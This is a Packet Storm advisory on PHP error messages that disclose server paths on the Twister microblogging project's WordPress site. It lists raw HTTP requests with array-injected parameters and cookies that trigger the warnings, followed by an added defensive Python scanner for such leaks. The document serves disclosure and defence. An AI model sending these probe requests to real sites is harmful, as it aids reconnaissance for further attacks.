Packet Storm | Juan Carlos Garcia | PACKETSTORM:124763
Jan 13, 2013 - 12:00 a.m.

Twister Peer-To-Peer Microblogging Information Disclosure

packetstormsecurity.com
`========================================================================  
TWISTER Peer-To-Peer Microblogging: Multiple Application Error Messages (disclosing sensitive information)  
========================================================================  
  
TIME-LINE VULNERABILITY  
  
Multiple advisories, but no response; not fixed  
  
-----------------  
Alerts summary  
-----------------  
  
  
Application error message  
**********************  
  
/  
  
author   
  
cat   
  
comment_author_email_46104838c3366e1644fd983230bdf8c5   
  
comment_author_url_46104838c3366e1644fd983230bdf8c5   
  
feed   
  
m   
  
s   
  
wordpress_46104838c3366e1644fd983230bdf8c5   
  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5   
  
/wp-comments-post.php  
  
author   
  
comment   
  
email   
  
url   
  
/wp-login.php  
  
comment_author_email_46104838c3366e1644fd983230bdf8c5   
  
comment_author_url_46104838c3366e1644fd983230bdf8c5   
  
redirect_to   
  
user_email   
  
user_login   
  
wordpress_46104838c3366e1644fd983230bdf8c5   
  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5  
  
  
I. VULNERABILITY  
-------------------------  
  
#Title: TWISTER.NET Multiple Application Error Messages (disclosing sensitive information)  
  
#Vendor: http://www.twister.net.co  
  
#Author: Juan Carlos García (@secnight)  
  
#Verified: Francisco Moraga (@BTShell)  
  
#http://asap-sec.com  
  
  
II. DESCRIPTION  
-------------------------  
  
Twister Peer-to-peer microblogging is a fully decentralized P2P microblogging   
platform built on the free software implementations of the Bitcoin and BitTorrent protocols.   
  
  
III. PROOF OF CONCEPT  
-------------------------  
  
--Attack details---  
  
Application error message  
-------------------------  
  
Vulnerability description  
*************************  
  
This page contains an error/warning message that may disclose sensitive information.  
  
The message can also contain the location of the file that produced the unhandled exception.  
  
  
Affected items  
---------------  
/   
/wp-comments-post.php   
/wp-login.php   
  
  
Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst  
  
Error message found:   
  
  
<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />  
  
  
URL encoded GET input author was set to 1  
  
Error message found:   
  
<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br />  
  
GET /?author[$secnight]=1&feed=rss2 HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;  
comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1;  
wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
X-Pingback: http://twister.net.co/xmlrpc.php  
Host: twister.net.co  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
  
  
URL encoded GET input cat was set to 1  
  
Error message found:   
  
<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>1771</b><br />  
  
  
GET /?cat[$secnight]=1 HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;  
wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Host: twister.net.co  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
  
  
  
Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1  
  
Error message found:   
  
<b>Warning</b>: strip_tags() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/formatting.php</b> on line <b>3261</b><br />  
  
  
  
  
GET / HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;  
wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Referer: http://twister.net.co:80/  
Host: twister.net.co  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
  
  
URL encoded GET input feed was set to 1  
  
Error message found:   
  
<b>Warning</b>: strpos() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/class-wp.php</b> on line <b>331</b><br />  
  
  
GET /?author=1&feed[$secnight]=1 HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+;  
wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Host: twister.net.co  
  
  
Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst  
  
Error message found:   
  
<b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />  
  
  
GET /wp-login.php HTTP/1.1  
  
Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1;  
comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst;  
comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+;  
wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+  
  
Referer: http://twister.net.co:80/  
  
Host: twister.net.co  
  
Etc.  
  
  
IV. BUSINESS IMPACT  
-------------------------  
  
The impact of this vulnerability:  
  
The error messages disclose sensitive information. This information can be used to launch further attacks.  
  
  
V. SOLUTION  
------------------------  
  
Pentesting, Review and Write Secure Code.  
  
  
VI. CREDITS  
-------------------------  
  
This vulnerability was discovered by Juan Carlos García (@secnight)  
  
Verified by  
  
Francisco Moraga (@BTShell)  
  
ASAP-SEC Team Members  
  
Security As Soon As Possible (@Asap_Sec)  
  
  
VII. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`
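
For site owners who want to check their own pages for the kind of error message quoted in the advisory, the following is an added example (not part of the original advisory) that scans an HTTP response body for PHP diagnostics exposing a server-side file path. The names `Leak`, `scan_response` and `exposed_files` are hypothetical, and the sample bodies and paths are constructed placeholders.

```python
import html
import re
from typing import NamedTuple

class Leak(NamedTuple):
    level: str      # Warning, Notice, ...
    function: str   # PHP function named in the message, "" if none
    file: str       # server-side path exposed to the client
    line: int

# PHP diagnostic, with or without html_errors markup (<b>...</b>).
PHP_DIAG = re.compile(
    r"(?:<b>)?(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error)(?:</b>)?"
    r":\s+(?P<msg>.+?)\s+in\s+(?:<b>)?"
    r"(?P<file>(?:/|[A-Za-z]:\\)[^<\r\n]*?\.(?:php|inc|phtml))(?:</b>)?"
    r"\s+on line\s+(?:<b>)?(?P<line>\d+)"
)
FUNC = re.compile(r"^(\w+)\(\)")

def scan_response(body: str) -> list[Leak]:
    """Return every PHP diagnostic in a response body that exposes a file path."""
    text = html.unescape(body)  # also catch entity-encoded copies (&lt;b&gt;...)
    leaks = []
    for m in PHP_DIAG.finditer(text):
        func = FUNC.match(m["msg"])
        leaks.append(Leak(m["level"], func.group(1) if func else "",
                          m["file"], int(m["line"])))
    return leaks

def exposed_files(leaks: list[Leak]) -> list[str]:
    """Unique disclosed paths, sorted, for a report or a CI failure message."""
    return sorted({leak.file for leak in leaks})

# Constructed sample bodies (paths are placeholders, not taken from any real host).
SAMPLE_HTML = (
    "<b>Warning</b>: trim() expects parameter 1 to be string, array given in "
    "<b>/srv/www/example/wp-includes/plugin.php</b> on line <b>199</b><br />\n"
    "<b>Warning</b>: urldecode() expects parameter 1 to be string, array given in "
    "<b>/srv/www/example/wp-includes/query.php</b> on line <b>2519</b><br />\n"
)
SAMPLE_PLAIN = ("Notice: Undefined index: cat in "
                "/srv/www/example/wp-includes/query.php on line 1771")
SAMPLE_CLEAN = "<html><body><p>Warning: comments are closed.</p></body></html>"

if __name__ == "__main__":
    for body in (SAMPLE_HTML, SAMPLE_PLAIN, SAMPLE_CLEAN):
        print(scan_response(body))
```

A non-empty result means the server is sending diagnostics to clients; in PHP this output is controlled by the `display_errors` setting, with `log_errors` keeping the messages in the server log instead.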